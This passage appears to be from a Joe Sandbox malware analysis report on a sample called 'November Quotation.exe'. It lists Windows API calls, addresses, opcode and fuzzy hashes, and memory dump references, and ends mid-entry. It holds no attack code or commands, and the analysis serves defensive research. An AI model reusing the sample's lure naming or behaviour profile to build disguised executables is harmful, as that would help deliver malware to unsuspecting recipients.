                                                                                                              • Instruction ID: b871747afe6714f775cf68b58f9ce13ecb08d5158756a0c27f794d38c03cb7b2
                                                                                                              • Opcode Fuzzy Hash: 2e3c38ced10844c1f89000f967576cb7b7b3550329efd427a3e1ae9871f18f13
                                                                                                              • Instruction Fuzzy Hash: 45E08CB2700100CBCB00AFA5AA8899D3378AB9036AB61047BE502F10D1CAB86C00867D
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402DA7,00442800,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                                              • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                                                                              • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                                              • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,004055ED,?,?,00000000,004057C3,?,?,?,?), ref: 004059ED
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405A01
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                                                              • Instruction ID: 105d3d0d857cc0cbbba7b98f67225fc33718dd0dc61d1976ebfe603fb8111b00
                                                                                                              • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                                                              • Instruction Fuzzy Hash: 7CD01272504421AFC2102728EF0C89BBF55DB543717028B35FDB5A22F0CB304C668E99
                                                                                                              APIs
                                                                                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PathSearch
                                                                                                              • String ID:
                                                                                                              • API String ID: 2203818243-0
                                                                                                              • Opcode ID: e3018e7ccbf6b0b8f4089fea3abd55c43ce8fdbcebedaecf1e26ca3bf4efb78a
                                                                                                              • Instruction ID: 4eaa37579247ab569ef71c9da69eb153776a577472de3bb4f1afb84713341362
                                                                                                              • Opcode Fuzzy Hash: e3018e7ccbf6b0b8f4089fea3abd55c43ce8fdbcebedaecf1e26ca3bf4efb78a
                                                                                                              • Instruction Fuzzy Hash: F4E04FB2314200AAD700DFA5DE48EAA77A8DB01368F31453AE211B60C1E6B4A941972D
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                                              • Instruction ID: 7cd01a958b5c1bc067bce53bc18bc5b829c77e753be975c6bca72629bb04cfa2
                                                                                                              • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                                              • Instruction Fuzzy Hash: F7E04F76180108AFD700DFA4EE4AED977ECAB14704F004021B608E6091C674E5408B58
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031DB,00000000,00000000,00402FF3,000000FF,00000004,00000000,00000000,00000000), ref: 00405AA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                              • Instruction ID: 07b625fac44bf3ff9367e003840ea8544b808996ef6c51cee1fe321e6e9f2367
                                                                                                              • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                              • Instruction Fuzzy Hash: B1E08C3220125AEBEF11AE958C40AEB3B6CEB04360F004832FD10E3240D234E8218FE8
                                                                                                              APIs
                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: f2af23d7b92e53a2acd04ddf975dd27e66fbd92792c3849ace18968cd41a86ca
                                                                                                              • Instruction ID: 9c04f39ce4fd2a8f072a16edee9a523c1dbf43d37fe581579a3a7f114a74ca33
                                                                                                              • Opcode Fuzzy Hash: f2af23d7b92e53a2acd04ddf975dd27e66fbd92792c3849ace18968cd41a86ca
                                                                                                              • Instruction Fuzzy Hash: 16D017B27042009BCB00DFA9AA08A9E77B49B55339F310937E201F21D0D6B895509A2E
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404044
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                                              • Instruction ID: bb65c4dcbe1315864773f47b2f89f2ce31b8fce6277c943a49bb9af31e43d00f
                                                                                                              • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                                              • Instruction Fuzzy Hash: 84C09BB17407007BEA208F609D46F17775477B4702F1844397341F60D0C674D410DA1C
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000028,?,00000001,00403E47), ref: 00404029
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                                              • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                                                                              • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                                              • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2E,?,?,?,?,00000000,0040344F,?), ref: 004031EC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                              • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                              • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                              • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                              APIs
                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403DE0), ref: 00404012
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2492992576-0
                                                                                                              • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                                              • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                                                                              • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                                              • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049DF
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049EA
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A34
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A47
                                                                                                              • SetWindowLongW.USER32(?,000000FC,00404FBF), ref: 00404A60
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A74
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A86
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A9C
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404AA8
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ABA
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404ABD
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AE8
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AF4
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B8A
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404BB5
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BC9
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BF8
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404C06
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404C17
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404D14
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D79
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D8E
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404DB2
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DD2
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DE7
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DF7
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E70
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404F19
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F28
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F48
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F96
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404FA1
                                                                                                              • ShowWindow.USER32(00000000), ref: 00404FA8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N$|ru
                                                                                                              • API String ID: 1638840714-138115210
                                                                                                              • Opcode ID: fc100a1567586deb5399e3b3a8cb6ce54a25ad1339cc7449dce1ec81924229a7
                                                                                                              • Instruction ID: e53c56638097080d8a9576e5f9c25271d89cd91d9f9dd4264a0f886a8ea3ee34
                                                                                                              • Opcode Fuzzy Hash: fc100a1567586deb5399e3b3a8cb6ce54a25ad1339cc7449dce1ec81924229a7
                                                                                                              • Instruction Fuzzy Hash: CE028FB0900209EFEB109F54DD85AAE7BB5FB84315F10813AF611BA2E1C7B89D52DF58
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004044D0
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004044FA
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004045AB
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004045B6
                                                                                                              • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 004045E8
                                                                                                              • lstrcatW.KERNEL32(?,: Completed), ref: 004045F4
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404606
                                                                                                                • Part of subcall function 00405561: GetDlgItemTextW.USER32(?,?,00000400,0040463D), ref: 00405574
                                                                                                                • Part of subcall function 00406035: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\November Quotation.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 00406098
                                                                                                                • Part of subcall function 00406035: CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                                                                • Part of subcall function 00406035: CharNextW.USER32(?,"C:\Users\user\Desktop\November Quotation.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004060AC
                                                                                                                • Part of subcall function 00406035: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004060BF
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 004046C7
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E2
                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404768
                                                                                                              Strings
                                                                                                              Memory Dump Source
